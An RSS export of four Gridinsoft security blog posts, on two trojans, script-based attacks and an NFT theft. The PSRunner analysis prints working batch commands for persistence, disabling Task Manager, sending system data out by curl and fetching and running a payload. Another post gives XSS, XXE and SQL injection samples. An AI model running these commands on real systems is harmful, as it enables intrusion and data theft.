Script-based Archives – Gridinsoft Blog Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe. Thu, 29 Aug 2024 20:14:55 +0000 en-US hourly 1 https://wordpress.org/?v=62430 200474804 Trojan:BAT/PSRunner.VS!MSR https://gridinsoft.com/blogs/trojan-bat-psrunner-vs-msr/ https://gridinsoft.com/blogs/trojan-bat-psrunner-vs-msr/#respond Tue, 23 Jul 2024 18:12:28 +0000 https://gridinsoft.com/blogs/?p=25859 Trojan:BAT/PSRunner.VS!MSR is a detection of malware that executes malicious commands on a compromised system. It does not do much hurt by itself and rather serves for payload delivery & running. Aside from that, it does some basic system reconnaissance and gains persistence for the further payloads. Trojan:BAT/PSRunner.VS!MSR Overview Trojan:BAT/PSRunner.VS!MSR is a type of malware detection… Continue reading Trojan:BAT/PSRunner.VS!MSR

The post Trojan:BAT/PSRunner.VS!MSR appeared first on Gridinsoft Blog.

]]>
Trojan:BAT/PSRunner.VS!MSR is a detection of malware that executes malicious commands on a compromised system. It does not do much hurt by itself and rather serves for payload delivery & running. Aside from that, it does some basic system reconnaissance and gains persistence for the further payloads.

Trojan:BAT/PSRunner.VS!MSR Overview

Trojan:BAT/PSRunner.VS!MSR is a type of malware detection identifier used by Microsoft Defender antivirus. This heuristic detection applies to batch files (.bat), which are scripts that can execute a series of commands in Windows via PowerShell. Typically, it downloads and executes additional malicious software, making it a simplified version of a dropper. Although less flexible, PSRunner is still capable of making quite a mess in the system.

Trojan:BAT/PSRunner.VS!MSR detection window
Trojan:BAT/PSRunner.VS!MSR detection

Typically, it is spread through email attachments in phishing campaigns. This is the most popular tactic, where emails appear to come from legitimate sources, prompting recipients to open the attachment or click on malicious links. Additionally, the trojan can be downloaded from pirate or malicious websites in the form of cheats and mods for games. In that case, the disguise is not an attachment, but the entire game installer that serves a shell around the malignant script.

Technical Analysis

Let’s delve deeper into how Trojan:BAT/PSRunner.VS!MSR behaves after it infiltrates a system. As a .bat file, it lacks advanced features like sandbox or debugger checks. However, it still attempts to operate as stealthily as possible to avoid detection by the user. Upon execution, it hides itself from the PowerShell window using the following command:

attrib +h +s %0

Persistence

Next, the malware takes steps to establish persistence in the system. It executes the following commands:

set valinf="rundll32_%randoM%_toolbar"
set reginf="hklm\Software\Microsoft\Windows\CurrentVersion\Run"
reg add %rEgINf% /v %VaLinf% /t "REG_SZ" /d %0 /f > nul
copy %0 "%uSERPROFILE%\Start Menu\Programs\Startup"
echo start "" %0>>%SystemDrive%\auTOexec.baT
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d %WINDir%\%a%.bat /f > nul

By doing this, the malicious script creates multiple registry entries, enabling it to run at every system startup. Additionally, it copies the script to the user’s Startup folder to ensure it launches upon system login.

As mentioned earlier, this is simply a script using PowerShell. Unlike more advanced malware, it cannot hide in the Task Manager. This means the user can terminate the process by ending the PowerShell process in the Task Manager. Therefore, the malware’s next step is to disable the Task Manager. It adds the following registry key:

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >nul

Gathering Information

Next, the malware collects various information about the system. This process is often referred to as system fingerprinting. In this case, the fingerprint is quite detailed. The malware executes the following command:

powershell -Command "Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table >%usErPrOfiLE%\apps.txt"
curl -v -F "chat_id=-655682538" -F document=@%uSERPRoFILE%\apps.txt %WEbHooK%

This command saves a list of installed applications to a text file named apps.txt and sends it to a remote server. The script then gathers system information into a file named userdata.txt using the following commands:

echo Username %usERnAME% >> userdata.txt
echo IP %IPV4% >> userdata.txt
echo. >> userdata.txt
ipconfig >> userdata.txt
echo. >> userdata.txt
getmac >> userdata.txt
echo. >> userdata.txt
wmic cpu get caption name, deviceid, numberofcores maxclockspeed, status >> userdata.txt
echo. >> userdata.txt
wmic computersystem get totalphysicalmemory >> userdata.txt
echo. >> userdata.txt
wmic partition get name,size,type >> userdata.txt
echo. >> userdata.txt
systeminfo >> userdata.txt
echo. >> userdata.txt
wmic path softwareLicensingService get OA3xOriginalProductKey >> userdata.txt
echo. >> userdata.txt
echo. >> userdata.txt
echo. >> userdata.txt

After gathering this information, it sends the file to a remote server with the following command:

cu rl -v -F "chat_id=-655682538" -F document=@%useRpRofIlE%\userdata.txt %WEBHOOk%
del userdata.txt
del apps.txt

By doing this, the malware retrieves and transmits extensive system details, including installed applications, network configurations, hardware specifications, and system information. Finally, it deletes the files userdata.txt and apps.txt to cover its tracks.

Payload

The final stage of the script’s execution involves running the following command:

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/971160786015772724/971191444410875914/GetToken.exe', 'GetToken.exe') "
start GetToken.exe
ping 127.0.0.1 3 > "e.txt"
start GetToken.exe

As we can see, the script uses PowerShell to download an executable file named GetToken.exe from Discord servers and then runs it. All the naming of the involved files are made to create the least suspicion.

How To Remove Trojan:BAT/PSRunner.VS!MSR?

To remove Trojan:BAT/PSRunner.VS!MSR, you need to use an advanced anti-malware solution with a heuristic module. Additionally, it is crucial to maintain continuous system protection to prevent future infections. GridinSoft Anti-Malware is an excellent choice because, in addition to proactive protection, it has an Internet Security module. This will block potentially unsafe sites, thus preventing the infection process at the earliest stage.

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

The post Trojan:BAT/PSRunner.VS!MSR appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/trojan-bat-psrunner-vs-msr/feed/ 0 25859
How can an attacker execute malware through a script? https://gridinsoft.com/blogs/script-based-malware/ https://gridinsoft.com/blogs/script-based-malware/#respond Wed, 19 Jun 2024 07:23:27 +0000 https://gridinsoft.com/blogs/?p=6804 Over the last four years, the share of script-based attacks of malware offenses worldwide has grown so drastically that it raised alerts among security specialists and ordinary users. In this post, we shall regard script-based malware, assess its strengths and weaknesses, explain how the attacks happen, and suggest measures to maintain security in your workgroup.… Continue reading How can an attacker execute malware through a script?

The post How can an attacker execute malware through a script? appeared first on Gridinsoft Blog.

]]>
Over the last four years, the share of script-based attacks of malware offenses worldwide has grown so drastically that it raised alerts among security specialists and ordinary users. In this post, we shall regard script-based malware, assess its strengths and weaknesses, explain how the attacks happen, and suggest measures to maintain security in your workgroup.

What is Script Malicious Code?

To understand how someone can run a script-based attack on a computer, we must know what scripts are. They are sets of commands for a system to execute. Users employ them to automatize processes that they would otherwise perform manually. Programmers and advanced users create scripts in scripting languages. Those can be, roughly speaking, general-purpose (such as JavaScript, Python, and PHP), OS-oriented (like PowerShell and AppleScript), and there are also special script languages for particular applications and environments.

PowerShell Window
PowerShell is a handy Windows automation tool and a suitable environment for script-based attacks.

The scripts are neither malicious files nor the main content of the files they inhabit. Instead, they are the documents’ allowable components, legal and, in theory, beneficial to the user. Scripts are not compiled. That means they are interpreted and executed by the software environment ad hoc without previous translation into machine code. For AppleScript, for example, such an environment is an Apple operating system. And for cross-system JavaScript (if it is about website construction), any modern web browser can serve as an interpreting environment.

The script-based hacker attacks are cyber crimes that use scripts as a primary tool.

Malware Script Examples

Cross-Site Scripting (XSS) Attacks

XSS (Cross-Site Scripting) attacks can result in data theft, session hijacking, and unauthorized access to confidential information. They also jeopardize user trust, damage the reputation of web applications, and may lead to legal repercussions under data privacy regulations like GDPR (General Data Protection Regulation) and CCPA (California Consumer Privacy Act).

<p>User's comment: <script>alert('Malicious Script')</script></p>
<!-- This user input is not properly sanitized -->
<p>User's comment: <?php echo $_GET['comment']; ?></p>

Consider a website that allows users to submit their own content or post comments. In this scenario, an attacker has posted a comment containing a script tagged as “Malicious Script.” This script was displayed directly without proper sanitation or encoding, leading it to execute in other users’ browsers when viewed. As a result, any user reading the comment would see a pop-up saying Malicious Script, illustrating how attackers can execute scripts in the browsers of unsuspecting users. This highlights a serious vulnerability: the script used in the attack could be modified to execute more complex commands that could potentially steal user data directly from their browser.

XML External Entity (XXE) Vulnerability

XXE, or XML External Entity attack, exploits vulnerabilities in applications that parse XML files. This issue arises when an application’s XML parser improperly configures security settings, allowing it to dereference external entities within the XML file. During parsing, if the application processes these entities, it could unintentionally leak sensitive data, disrupt services, perform unauthorized actions on the server, or access other parts of the system.

import xml.etree.ElementTree as ET
xml_data = """
<!DOCTYPE data [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>
"""
root = ET.fromstring(xml_data)

When the Python script runs and processes the XML document with the ElementTree library, it attempts to access the /etc/passwd file.

SQL Injection

SQL injection is a prevalent cybersecurity risk where attackers can alter a web application’s database by inserting harmful SQL code into its input fields. These fields can include any data entry areas on a website, like web forms or URLs. When successful, SQL injection attacks allow attackers to access and manipulate databases, which could lead to the exposure of sensitive information.

user_input = input("Enter your username: ")
sql_query = "SELECT * FROM users WHERE username = '" + user_input + "'"
cursor.execute(sql_query)

In this scenario, user input is directly incorporated into the SQL query string. If an attacker provides harmful input, they might alter the SQL query, potentially obtaining unauthorized access to the database.

What is so worrying about script-based attacks?

First of all, scripts are not files, as we already mentioned. Antivirus programs have a hard time detecting them, or better to say: they are useless against scripts. It is so because modern security software focuses on detecting and removing malicious files. Thus, in the case of script-based attacks, we are dealing with ghostly malware, invisible to antivirus programs.

Another important thing is that scripts are generally hard to detect. They exist in primary memory, soon to be overwritten or erased. It is possible to find the origin of a script if criminals inaccurately leave traces, but why would they do that?

How can an attacker execute malware through a script?

Let’s make it clear: we are not talking about malicious scripts tied to websites (Cross-Site Scripting), which are more or less studied and covered by browser and antivirus security systems. Files fitted with simple yet treacherous scripts constitute a new problem. These are the files whose formats antivirus software lets through by default, not regarded as dangerous: PDF, Word, e-books, HTML applications, and others.

Simple JavaScript code usually employed in files like these can add various practical functions, like making PDF documents signable or featuring a fillable questionnaire. But the script can have a malicious purpose as well. In case of a script-based attack, it most likely will be a set of commands to download any other malware that harms for real. Ransomware, for instance, is the most lucrative type of attack for hackers. The crooks only expect a user to open a file to run the script or, in some cases, to allow macros therefor.

Disabled Macros in Word
RED FLAG: a downloaded document asks you to enable macros in MS Office.

Script-stuffed files can also be downloaded items you are trusty about since they update programs you already have. At least, you believe so. These can be plug-ins, add-ons, and so on. Yes, the UAC will ask whether you want to download this file, but this always happens, and we tend to ignore such warnings. If the criminals manage to cheat you – consider they also cheated your security software. By the way, various untrustworthy PDF-readers and their plug-ins are some of the most dangerous programs in terms of script-based attack menace.

The script-based attacks mostly endanger Windows systems by exploiting vulnerabilities of Command Prompt and PowerShell, the in-built automation tools. However, neither Android, iOS nor even Linux is safe.

How to protect yourself and your workgroup?

The weakness of script-based malware is that it has to be run by the user. Therefore, the best protection is to be cautious and avoid unknown downloads. Remember that PDF, Word, and other data files can contain a malicious script. These bogus files are most likely to arrive via e-mail or messengers in letters sent seemingly by someone you trust – usually services-providing organizations. Be especially wary of reports from delivery companies like FedEx. Since a postal delivery is pretty believable to be unexpected, hackers often use this disguise for their phishing mail. Before downloading any attachments from suspicious senders, triple-check the source and the message itself. If you are attentive enough, you will find a mistake in the address line, your name, or the text itself.

Email with a PDF attachment
Watch out for dubious e-mails with enclosed PDF files, Word documents, HTML application, etc.

In workgroups, it makes sense to separate those computers that need to run scripts from those that can do without them. The former should maintain extreme vigilance and advisably deploy zero-trust policy antivirus software, which is for the moment presented by Windows 11 Defender. It has many issues, but it seriously jeopardizes the plans of malefactors who go in for script-based attacks.

Script-fitted files can spread rapidly via the injured network using the same vulnerabilities of Windows elements they use to deliver their malicious payload. General security measures, such as file backup and network separation, are also a must to minimize the destructive effect of any successful cyber-attack.

How to detect script-based malware?

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

The post How can an attacker execute malware through a script? appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/script-based-malware/feed/ 0 6804
Trojan:Script/Phonzy.B!ml https://gridinsoft.com/blogs/trojanscript-phonzy-removal-guide/ https://gridinsoft.com/blogs/trojanscript-phonzy-removal-guide/#respond Tue, 27 Feb 2024 08:45:57 +0000 https://gridinsoft.com/blogs/?p=19960 Trojan:Script/Phonzy.B!ml is a generic detection name used by Microsoft Defender. This type of malware is categorized as a loader as it mainly aims at delivering malicious payloads onto infected systems. Throughout hundreds of infection cases, Phonzy trojan was noticed to often deliver banking trojans. Trojan:Script/Phonzy.B!ml Overview Trojan:Script/Phonzy.B!ml is a generic detection name that Windows Defender… Continue reading Trojan:Script/Phonzy.B!ml

The post Trojan:Script/Phonzy.B!ml appeared first on Gridinsoft Blog.

]]>
Trojan:Script/Phonzy.B!ml is a generic detection name used by Microsoft Defender. This type of malware is categorized as a loader as it mainly aims at delivering malicious payloads onto infected systems. Throughout hundreds of infection cases, Phonzy trojan was noticed to often deliver banking trojans.

Trojan:Script/Phonzy.B!ml Overview

Trojan:Script/Phonzy.B!ml is a generic detection name that Windows Defender uses to mark small malware families. Such malicious programs may have similar behavior and code elements but belong to different groups.

Phonzy B!ml detection Defender

For functionality, Phonzy.B!ml is a scripted dropper malware. Its main purpose is to download and launch the additional malware in a manner that does not require user interaction. However, Phonzy samples are able to collect some basic information regarding the system, like location, OS version, and things the like. A typical payload delivered in Phonzy malware attacks is banking trojans – a specific type of stealers, which aims precisely at online banking information.

Is Phonzy B!ml False Positive?

The deeper look at the naming convention Microsoft uses in its detection names shows that the “!ml” particle stands for “machine learning”, meaning their AI detection engine has detected the file. Despite being highly effective and promising, it requires the confirmation of a signature detection system. Without this confirmation, it is particularly easy to get a lot of false positive detections.

Unfortunately, there is barely a way to distinguish between real and false detections. Modern malware does its best in hiding among legitimate programs and files, so file locations are not informative. That is the reason why I recommend scanning your system with GridinSoft Anti-Malware.

Phonzy.B!ml Technical Analysis

Since Phonzy is a generic detection name, it is rather hard to find a well-known sample to analyze. For that reason, I’ve done a comprehensive analysis of several ones – to have a better understanding of what this malware is capable of. In short – a rather simple dropper that can make a huge mess in the system it infects.

Launch & Unpacking

The majority of Phonzy samples that I’ve encountered arrive in a packed form – encrypted and/or archived. This is usually done for 2 reasons – to avoid the static detection and complicate the analysis. In the case of Phonzy, I’m leaning toward the first option.

Unpacking process
Process of malware unpacking

To perform the unpacking, Phonzy relies on the script that downloads it to the system. Usually, this is a PowerShell script that pulls the dropper from the intermediary server, and it is also responsible for launching one. A part of it is responsible for unpacking and launching the sample after downloading.

Gathering system information

Once launched, Trojan:Script/Phonzy.B!ml collects basic information about the target system. This may include the operating system version, hardware information, a list of installed programs and devices, and the device’s geolocation. Such information is mostly needed to fingerprint the system, i.e. give it a specific name corresponding to its internals. In addition to system info, some of the Phonzy.B!ml samples were able to take screenshots of the infected device’s screen.

System info log Phonzy
System info collected by one of Phonzy samples

Contacting Command & Control Server

The next step in the attack is contacting the command server. Malware sends an HTTP POST request to the C2, to notify about a new infection and send the collected data. Depending on the server response, malware may switch to idle or start downloading other malware. Overall, the C2 communications for Phonzy are simple and insignificant.

Delivering other malware

The key action of Phonzy Trojan is, obviously, deploying other malware samples to the infected system. It receives the instructions from the C2 in a form of IP address it should pull the payload from, and the way this payload should be launched. Usually, the said IP address corresponds to a compromised website that hackers use as an intermediary server.

For the ways to run the payload, the options are quite typical for droppers. All of the Phonzy samples I’ve analyzed were able to work with DLLs and executable files. The former can be launched through DLL hijacking and a hookup to the system DLL, while the latter is about the regular .exe run.

Self-Propagation to USB Drives

Some of the inspected variants are Phonzy.B!ml were capable of self-propagating via attached flash drives or other removable storage media. This is a rather unusual trick for modern malware, as security vendors elaborated the ways to detect virus-like spreading long ago. Nonetheless, you cannot deny effectiveness – a single infected USB drive is capable of infecting dozens of other systems without even a single click from malware masters.

How To Remove Trojan:Script/Phonzy.B!ml

To remove Phonzy B!ml, I’d recommend using GridinSoft Anti-Malware. The fact that dropper malware can spread a lot of other malware requires using advanced software to remove it all. GridinSoft Anti-Malware will check every little bit of the system and eliminate even the stealthiest malware.

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

Safety Recommendations

To avoid infection of your system, it is sufficient to follow basic cyber hygiene. The first rule is to avoid pirated software and sites that distribute it. Cracked software is an ideal shell for malware delivery, so it is not just about being careful – it is about staying away.

Having an advanced protection tool, like Gridinsoft Anti-Malware, is another key to make your system secure. Proactive protection coupled with an AI detection engine will weed out all the attempts of malicious software to get in. Also, its Removable Device Protection feature will block the Phonzy trojan attempting to infect the system via an USB drive.

The post Trojan:Script/Phonzy.B!ml appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/trojanscript-phonzy-removal-guide/feed/ 0 19960
29 Moonbirds Stolen via Link Click from a Proof Collective Member https://gridinsoft.com/blogs/moonbirds-stolen/ https://gridinsoft.com/blogs/moonbirds-stolen/#respond Wed, 01 Jun 2022 16:18:05 +0000 https://gridinsoft.com/blogs/?p=8232 29 Moonbirds, NFTs amounting to around 750 ETC (approximately $1,5M) in value, were stolen from an unmentioned Proof Collective member as a result of a scam, according to the May 25 tweet by @CirrusNFT. The theft happened as the victim clicked an unchecked link signing a transaction offered by a scammer who pretended to be… Continue reading 29 Moonbirds Stolen via Link Click from a Proof Collective Member

The post 29 Moonbirds Stolen via Link Click from a Proof Collective Member appeared first on Gridinsoft Blog.

]]>
29 Moonbirds, NFTs amounting to around 750 ETC (approximately $1,5M) in value, were stolen from an unmentioned Proof Collective member as a result of a scam, according to the May 25 tweet by @CirrusNFT. The theft happened as the victim clicked an unchecked link signing a transaction offered by a scammer who pretended to be a law-abiding buyer.

CirrusNFT tweet
The source of the news – a tweet by @CirrusNFT.

Another Proof Collective member, nicknamed Dollar (@knownasdollar on Twitter,) hinted that the scammer had been identified as @DVincent_ through doxxing via an exchange. According to the tweet, the total value of the items stolen by him (her?) reached around $2M.

Dollar and other Proof Collective members have already filed a report to the FBI; however, in his tweet, Dollar gave the crook a chance to avoid jail by delivering the stolen NFTs back.

Tweet by Dollar
The tweet by @knownasdollar exposing the Twitter account of the alleged criminal.

In the commentaries to Dollar’s message, other users confirmed that the alleged scammer has also tried to lure them into selling NFTs while insisting that the deal had to be stricken on a questionable peer-to-peer exchange.

The Twitter page of @DVincent_ is already inaccessible. Well, of course!

Proof Collective is a mysterious private club of non-fungible tokens collectors founded by Kevin Rose. To become a member, one must own a Proof Collective NFT. The membership fee is high enough to scare off random passers-by: 88 ETC which is more than $200 000, at least it was so in May 2022. Proof Collective is most famous for Moonbirds, a highly-hyped NFT campaign (selling 10 000 owl avatars for 2.5ETC each) launched on April 16, 2022.

The post 29 Moonbirds Stolen via Link Click from a Proof Collective Member appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/moonbirds-stolen/feed/ 0 8232